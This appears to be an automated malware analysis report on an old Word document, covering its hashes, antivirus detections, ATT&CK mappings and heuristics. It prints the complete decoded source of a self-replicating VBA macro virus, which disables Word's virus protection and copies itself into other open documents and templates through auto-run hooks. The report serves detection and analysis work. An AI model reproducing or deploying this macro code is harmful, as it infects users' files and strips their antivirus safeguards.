Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eeb7b95fdf7082e4…

MALICIOUS

Office (OLE)

Size: 40.5 KB
Created: 1997-04-26 16:26:00
Authoring application: Microsoft Word 8.0
First seen: 2015-09-22
MD5: 46428f466a7c89e81c209f8977d7a3c0
SHA-1: e2f0e2fe9a48d200617245cf3366322615dafb80
SHA-256: eeb7b95fdf7082e447c101f97e742d4e42be7ebf3de64bcf87bd405aae483290
Risk Score: 236

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass

The sample contains VBA macros that disable Word's virus protection and attempt to replicate themselves into other open documents and templates using the OrganizerCopy function. This self-replication behavior is a strong indicator of a macro-based trojan. The ClamAV detections further support its malicious nature.

Heuristics (6)

  • ClamAV: Doc.Trojan.CopyTest-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.CopyTest-1
  • VBA macros detected medium (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
        Word.Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
        Application.OrganizerCopy s, d, "AutoOpen", wdOrganizerObjectProjectItems
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
        Application.OrganizerCopy s, d, "AutoClose", wdOrganizerObjectProjectItems
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2393 bytes
SHA-256: 9911413c8dcfeea0939e9e396365238c1d88c373bf977cd036193f7d27aabf7c
Detection
ClamAV: Win.Trojan.Alicia-3
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Infect"
Sub MAIN()
    
    myname = ThisDocument.FullName
    Word.Options.VirusProtection = False
    
    For Each d In Word.Documents
        If (d.FullName <> myname) Then
            Debug.Print myname + " -> " + d.FullName
            Call CopyMacros(myname, d.FullName)
        End If
    Next d
    
    For Each t In Word.Templates
        If (t.FullName <> myname) Then
            Call CopyMacros(myname, t.FullName)
        End If
    Next t
    Rem Application.OrganizerCopy "d:\test2.doc", "d:\test1.doc", "Test", 3
End Sub

Sub CopyMacros(ByVal s As String, ByVal d As String)
    On Error GoTo AlreadyInfected

    Application.OrganizerCopy s, d, "Infect", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "AutoClose", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "AutoExec", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "AutoOpen", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "AutoExit", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "FileClose", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "FileSave", wdOrganizerObjectProjectItems
    Application.OrganizerCopy s, d, "FileSaveAs", wdOrganizerObjectProjectItems

AlreadyInfected:
End Sub

Sub SaveDoc()
    If (Application.ActiveDocument.Saved = False) Then
        If (Application.ActiveDocument.Path <> "") Then
            Application.ActiveDocument.Save
        End If
    End If
End Sub

Attribute VB_Name = "AutoClose"
Sub MAIN()
    Infect.MAIN
    Infect.SaveDoc
End Sub


Attribute VB_Name = "AutoExec"
Sub MAIN()
    Infect.MAIN
End Sub


Attribute VB_Name = "AutoOpen"
Sub MAIN()
    Infect.MAIN
End Sub

Attribute VB_Name = "AutoExit"
Sub MAIN()
    Infect.MAIN
End Sub


Attribute VB_Name = "FileClose"
Sub MAIN()
    Infect.MAIN
    Infect.SaveDoc
End Sub


Attribute VB_Name = "FileSave"
Sub MAIN()
    Infect.MAIN
End Sub


Attribute VB_Name = "FileSaveAs"
Sub MAIN()
    Infect.MAIN
    Word.Dialogs(wdDialogFileSaveAs).Show
End Sub